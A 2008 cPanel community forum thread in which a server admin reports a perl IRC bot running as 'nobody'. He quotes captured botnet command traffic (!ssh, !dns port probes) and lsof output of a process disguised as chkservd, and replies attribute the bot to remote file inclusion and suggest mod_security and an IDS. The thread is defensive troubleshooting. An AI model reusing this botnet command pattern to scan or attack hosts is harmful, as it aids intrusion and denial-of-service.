The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

From odd 'nobody' process to unusual and malicious IRC traffic

Discussion in 'General Discussion' started by jasonb3t, May 29, 2008.

  1. jasonb3t

    jasonb3t Member

    Joined:
    May 29, 2008
    Messages:
    15
    Likes Received:
    0
    Trophy Points:
    1
    We discovered an odd process on our CPanel server, launched from /usr/sbin/sshd, but running under the name "perl" as the user "nobody." It was taking up a lot of CPU time.

    Doing an "lsof | grep <PID number>," I found it would periodically open lots of Apache logs, attempt to start listeners on ports 80 and 443, and launch an IRC connection out to quakenet2.blueyonder.net.

    I started up a packet sniffer to see what the IRC traffic was about and I got this conversation (abc!~nobody@edu.users.quakenet.org is evidently our box responding to queries as an IRC bot):
    Code:
    PING :blueyonder2.uk.quakenet.org
    PONG :blueyonder2.uk.quakenet.org
    :AnGeL!~antonio@casteel.org PRIVMSG #udp :!ssh 77.81.160.1 22
    :AnGeL!~antonio@casteel.org PRIVMSG #udp :!ssh 77.81.160.1 80
    :_secure!~damian@Damian.users.quakenet.org PRIVMSG #udp :!dns 77.81.160.1
    :abc!~nobody@edu.users.quakenet.org PRIVMSG #udp :.4Unable to resolve ..77.81.160.1. .
    :abc!~nobody@edu.users.quakenet.org PRIVMSG #udp :Conexiunea la 77.81.160.1 (22) e in TIME OUT.
    :abc!~nobody@edu.users.quakenet.org PRIVMSG #udp :Conexiunea la 77.81.160.1 (80) e in TIME OUT.
    :_secure!~damian@Damian.users.quakenet.org PRIVMSG #udp :.ACTION of.
    :_secure!~damian@Damian.users.quakenet.org PRIVMSG #udp :.ACTION @ somn.
    :AnGeL!~antonio@casteel.org PRIVMSG #udp :!ssh 77.81.160.1 53
    :abc!~nobody@edu.users.quakenet.org PRIVMSG #udp :Conexiunea la 77.81.160.1 (53) este acceptata!
    PING :blueyonder2.uk.quakenet.org
    PONG :blueyonder2.uk.quakenet.org
    PING :blueyonder2.uk.quakenet.org
    PONG :blueyonder2.uk.quakenet.org
    
    After seeing that traffic, we had enough and did a "kill -9" to get rid of the process.

    Now we're seeing a process that supposedly part of CPanel trying to connect to a myriad of IRC servers:
    Code:
    # lsof -i | grep ircd
    chkservd   2327   nobody    0u  IPv4 935805051       TCP 172.16.0.10:52547->gw-vlan-264.drX-asd2.nl.euro.net:ircd (SYN_SENT)
    chkservd   2327   nobody    1u  IPv4 877984138       TCP ***ourIP***:47008->irc.rcn.com:ircd (ESTABLISHED)
    chkservd   2327   nobody    2u  IPv4 877708484       TCP ***ourIP***:44069->irc.rcn.com:ircd (ESTABLISHED)
    chkservd   2327   nobody  396u  IPv4 877852377       TCP ***ourIP***:45815->irc.rcn.com:ircd (ESTABLISHED)
    chkservd   2327   nobody  398u  IPv4 877704785       TCP ***ourIP***:43997->irc.rcn.com:ircd (ESTABLISHED)
    chkservd   2327   nobody  399u  IPv4 877719170       TCP ***another_of_ourIPs***:44211->irc.rcn.com:ircd (ESTABLISHED)
    chkservd   2327   nobody  400u  IPv4 877714142       TCP ***ourIP***:44119->irc.rcn.com:ircd (ESTABLISHED)
    chkservd   2327   nobody  401u  IPv4 877730070       TCP ***yet another_of_ourIPs***:44289->irc.rcn.com:ircd (ESTABLISHED)
    
    There are several IP addresses configured on the server and these connection attempts are actually being made from different ones--not just the default.

    I've run rootkit finders and some clamscans and I've come up with nothing. chkservd is not configured for any IRC services. Any ideas, gentlemen?
     
  2. ramprage

    ramprage Well-Known Member

    Joined:
    Jul 21, 2002
    Messages:
    667
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    Canada
    This looks like a perl IRC bot which usually gets uploaded to a users web space and run remotely. Virus scanners won't pick that type of thing up since it's not a virus. Upload Guardian will.

    Also having Nobody Check installed is a good idea to keep an eye on your nobody/web user processes.
     
  3. IPSecureNetwork

    IPSecureNetwork Well-Known Member

    Joined:
    May 28, 2005
    Messages:
    99
    Likes Received:
    0
    Trophy Points:
    6
    buddy you are another victim of the Shell Bots kiddies..
    this maybe happend because one of your customers have a vulnerable site with a remote file inclusion bug.

    one good idea is activate mod_security or snort inline to prevent this intrussions ..

    if you are infected with this perl bots your box will be available to be used like a gun against any target shotting a lot of Gbps to someone.

    the use of a very good ids constantly updated is one of the best practice i think to prevent this kind of troubles.

    Best Regards
     
Loading...

Share This Page